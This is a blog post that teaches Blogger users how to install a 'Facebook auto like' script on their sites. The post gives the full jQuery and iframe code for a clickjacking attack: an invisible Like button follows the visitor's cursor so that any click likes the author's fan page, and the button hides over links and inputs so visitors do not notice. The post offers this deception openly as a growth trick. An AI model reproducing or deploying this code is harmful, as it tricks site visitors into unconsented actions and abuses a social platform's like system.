Facebook is a great place where you can share your thoughts
and updates with your friend ,relatives and with your business customers via
page.!As I have previously posted many Facebook tricks like :-
- How to Find Facebook Profile /Page Username ID
- How To Make Single Name Or How To Remove Last Last From Facebook Account?
- How To Invite All Friends To Like Page By Using JavaScript ?
- How To Post Invisible Status On Facebook!
- Facebook Like Box Popup With Timer For Blogger/Blogspot With jQuery
- How To Post Any Picture In Your Facebook Chat Box.
You Must also take a on this topic also :- Why is Facebook Blue? Today i am again back with an amazing Facebook auto like trick Facebook has already been a great place to get more fans and share Stuff and updates with them, more fans on your page means more exposure to your business . Many People are using autolikers which were working previously but Now-a-days they are on creating Spam.Whatever is the means of liking's ,no one cares about it ,all just want likes and likes on their fan page .!
Well today I have found a unique script for your blogs
or website which can gain more unique likes to your Facebook page, with this script applied any unique visitor who
comes to your page can become your fan. He just needs to click anywhere on the
webpage as a small invisible like button will follow his mouse cursor and as
soon he clicks anywhere he will be liking your fan page. So this trick is quite useful and helps you a lot .. Now Lets take a
look at adding this script in blogger .!
First see
demo of the like box by clicking on the button below.
How To Add Auto-like Script In Blogger ?
- Now go to Blogger Dashboard > Template
- Download a copy of your template
Click Here
<-To Know How To Take Backup Of Your Template
- Click on Edit HTML
- Hit Proceed button
- Check Expand Widget Templates checkbox
- Find Ctrl + F below code in your template
</head>
7.Now
paste the below Code above it.
8.Now Search for :-
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"
type="text/javascript">
</script>
<script type='text/javascript'>
function ClickJackFbHide(){
jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=\'clickjack-button-wrapper\']").show();
}
</script>
8.Now Search for :-
</body>
9.And
then paste below code above it.
<!-- mytrickscorner.blogspot.com/ Fan Page Autolike Script Starts -->
<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity =0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com/MyTricksCorner&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();});
jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();});
jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>
<!-- mytrickscorner.blogspot.com/ Fan Page Autolike Script Ends -->
10.Replace MyTricksCorner With
your Facebook Page's Username ...!
11. Save The Template
11. Save The Template